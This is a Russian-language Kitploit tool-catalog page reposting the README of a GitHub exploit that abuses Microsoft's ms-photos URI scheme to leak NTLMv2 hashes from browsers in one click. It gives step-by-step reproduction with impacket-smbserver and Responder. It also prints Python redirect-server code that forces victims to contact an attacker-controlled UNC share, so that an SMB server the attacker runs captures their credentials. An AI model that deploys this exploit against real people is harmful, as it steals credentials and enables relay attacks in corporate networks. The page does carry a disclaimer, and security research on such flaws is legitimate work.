Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
ms-photos_NTLM_Leak — Новая уязвимость 0 day, позволяющая утекать NTLM хеши из браузеров за один клик. | Kitploit
Инструменты/GitHubGitHub/rubenformation/ms-photos_ntlm_leak
Атаки на ПаролиАнализ уязвимостейЭксплуатацияЛатеральное перемещениеФишингОбучение и ОбразованиеRed Teaming
GitHubrubenformation/ms-photos_ntlm_leak

ms-photos_NTLM_Leak

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Новая уязвимость 0 day, позволяющая утекать NTLM хеши из браузеров за один клик.

Репозиторий
2093129 месяцев назадПроверено Kitploit

Утечка NTLM через схему URI ms-photos от Microsoft

Новая уязвимость, позволяющая утечь хэши NTLM из браузеров одним кликом

Автор: Ruben Enkaoua

Описание


Схема URI ms-photos от Microsoft принимает fileName в качестве параметра, который можно указать в виде UNC-пути, что приводит к утечке хэшей NTLMv2-SSP при открытии. Создав специально отформатированную ссылку, злоумышленник может заставить жертву запустить приложение Microsoft Фотографии прямо из браузера. При активации это поведение приводит к утечке хэша NTLMv2-SSP жертвы на сервер, контролируемый злоумышленником. Этот недостаток позволяет раскрыть учетные данные и потенциально осуществить атаки ретрансляции в корпоративных средах, требуя минимального взаимодействия с пользователем (запуск приложения). Microsoft не признала уязвимость, и CVE не был присвоен. Также я вдохновлялся блогом Syss от 2022 года.

Поскольку запрос NTLMv2-SSP может быть утечён через общедоступные UNC-пути (за исключением случая, когда настроено правило брандмауэра для исходящего SMB/445), уязвимость можно комбинировать с заражением веб-сайтов, что приводит к атакам на цепочки поставок.

Из документации MSDN о схеме URI можно узнать следующее:


изображение


Шаги для воспроизведения


Запустите smb-сервер

root@kitploit:~
# With a picture: Opens the photo on the target with photos.exe
# Without a picture: Nothing, no photos.exe process window 
impacket-smbserver share . -smb2support

Запустите вредоносный python-сервер

root@kitploit:~
# Edit first the information about the IP, share, and filename for UNC coercing. 
python3 ms-photos-server.py

Перейдите по адресу

Откройте Chrome и перейдите по адресу /test


Демонстрация


Также это можно сделать с помощью Responder. Любые неразрешённые домены, отправляющие LLMNR-запрос, будут перенаправлены на скрипт, что позволит принудить любого пользователя вместо всплывающего окна аутентификации NTLM. Чтобы это сработало, сначала запустите скрипт, а затем Responder.


Демонстрация 2


Это работает, потому что наше приложение перенаправляет напрямую на схему URI ms-photos, содержащую UNC-путь нашего сервера:


root@kitploit:~
class RedirectHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        if self.path == "/":
            self.send_response(302)  # HTTP 302 Found (temporary redirect)
            self.send_header('Location', 'ms-photos:viewer?fileName=\\\\192.168.159.129\\share\\Capture.png')
            self.end_headers()
        else:
            self.send_response(404)
            self.end_headers()
            self.wfile.write(b"Not Found")

Перенаправление со стороны клиента:


изображение


Примечания


Этот код предназначен только для образовательных и исследовательских целей.
Автор не несёт ответственности за любое неправомерное использование этого кода.
Скачать инструмент